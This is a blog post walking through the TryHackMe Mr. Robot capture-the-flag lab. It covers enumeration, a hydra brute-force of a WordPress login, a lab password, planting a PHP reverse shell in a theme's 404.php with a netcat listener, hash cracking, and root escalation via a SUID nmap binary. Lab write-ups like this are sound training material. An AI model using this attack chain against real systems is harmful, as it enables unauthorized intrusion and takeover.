DEV Community

Cover image for Let's Hack The World in The MR. Robot CTF! ๐Ÿ‘พ
christine
christine

Posted on

Let's Hack The World in The MR. Robot CTF! ๐Ÿ‘พ

Today we are going to take a crack at the Mr. Robot CTF on Try Hack Me. I must say before we start that I love the design of this lab! The website is so cool, and so well thought out, it was just perfect. I really encourage you to look at all the videos, it's pretty hackery.๐Ÿ˜€

When you're ready, put on your FSOCIETY hoodie and let's hack the world!


What is key 1?

Once your machine is loaded, we can start with our basic enumeration. First things first, when we open up the IP address of the machine in our browser we are met with a command-line like website. Each command that you type in will load a video, so it's not really that important (but you can check it out if you want).

Mr Robot CTF

Let's run an nmap scan to see if we can find any services.
nmap -sV -Pn <your machine IP>
Mr Robot CTF

Mhh, we can see that our ssh port is closed. There is a ssl/http port that is of interest though. Let's run a gobuster scan to see which directories we can enumerate.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u <your machine IP> -t 50
Mr Robot CTF

We can see that there is a /robots directory. When we look at our hint it says "Robots". Let's navigate to our /robots.
Mr Robot CTF
Mr Robot CTF

We can see that our robots.txt mentions a key-1-of-3.txt file. It also has a fsocity.dic file which contains a list of passwords. Save this file because we will need it later. Let's navigate to it: <ip>/key-1-of-3.txt.
Mr Robot CTF

We've found our first key!
Mr Robot CTF


What is key 2?

When we look back at our gobuster scan, we can see that there is a /login and /wp-login directory that indicates that the site is made with Wordpress. Let's navigate to our /wp-login.
Mr Robot CTF

We won't get pretty far without a username and password (duh!). If we run a wpscan scan on our web application to see if we can find a user, we can see that we get nothing useful (except the Wordpress version which we could maybe exploit).
wpscan --url http://<your machine IP>/wp-login --enumerate u
Mr Robot CTF
Mr Robot CTF

We have one of two options now: manually trying different usernames or making use of Burp Suite's intruder to find a username. When I first did this CTF, I tried my luck by going with the most obvious usernames: MrRobot and Elliot. Elliot won!
Mr Robot CTF

Now that we have a username, we can go back to wpscan (or in my case I chose hydra) and enumerate through our fsocity.dic file that we downloaded above to find a valid password for Elliot.

  • export ip=<your machine IP>
  • hydra -l Elliot -P ./Downloads/fsocity.dic $ip -V http-form-post '/wp.login.php:log^USER^PASS^&wp-submit=Log In&testcookie=1:S=Location' Mr Robot CTF

This took my scanner 40 minutes, so to save you the effort I will reveal the password for you >> Elliot:ER28-0652. Let's log in using these credentials!
Mr Robot CTF

From here on, our next moves are pretty standard. Let's see if we can run a reverse shell using php by pasting our shell in the 404.php file in the theme editor. Remember to save this new file. You can download the reverse shell from pentestmonkey, and remember to update the IP address with the address of your OPENVPN (not your machine IP!) and insert the port of your choice (I left it at 1234).
Mr Robot CTF
Mr Robot CTF

Start up a netcat listener.
nc -nlvp <your port insterted in reverse shell>
Mr Robot CTF

Now, head over to <your machine IP>/404.php and check your netcat listener. We have successfully gained access via our reverse shell!
Mr Robot CTF
Mr Robot CTF

When we list the files of /home/robot, we find our key-2-of-3.txt file. There is also a password.raw.md5 file - which we'll get to later.
Mr Robot CTF

We have our second key!
Mr Robot CTF


What is key 3?

Let's read the contents of our password.raw.md5 file. It seems to be a hashed password for the user robot.
Mr Robot CTF

Let's see if we can crack this password hash. Head over to Crackstation and enter this hash.
Mr Robot CTF

Let's see what user we are currently by running whoami. We are running as daemon, but we can log into the user robot's account since we have the password (the one we just cracked)!

  • whoami
  • su robot Mr Robot CTF

Now that we are logged in as robot, let's then see what binaries we can access(to see if we can escalate our privilege via exploiting our binary library).
find / -perm -u=s -type f 2>/dev/null
Mr Robot CTF

The binary /nmap looks prmising. Head over to GTFObins and read up on how we can escalate our privilege using this library. We need to run an interactive shell which will give us root access.
nmap --interactive
Mr Robot CTF

From here on we can cd into root, and read the contents of our final flag file: key3-of-3.txt.
Mr Robot CTF

And so we got our flag!
Mr Robot CTF


Conclusion

There's a bunch of steps I took in between that didn't pan out into anything. There weren't any vulnerabilities for the Wordpress version, in case you were wondering. Ultimately, it was quite an easy CTF! ๐Ÿ˜

Mr Robot CTF

I hope this was easy enough for you to follow, and until next time, happy hacking!

See more on my GitHub.

Top comments (0)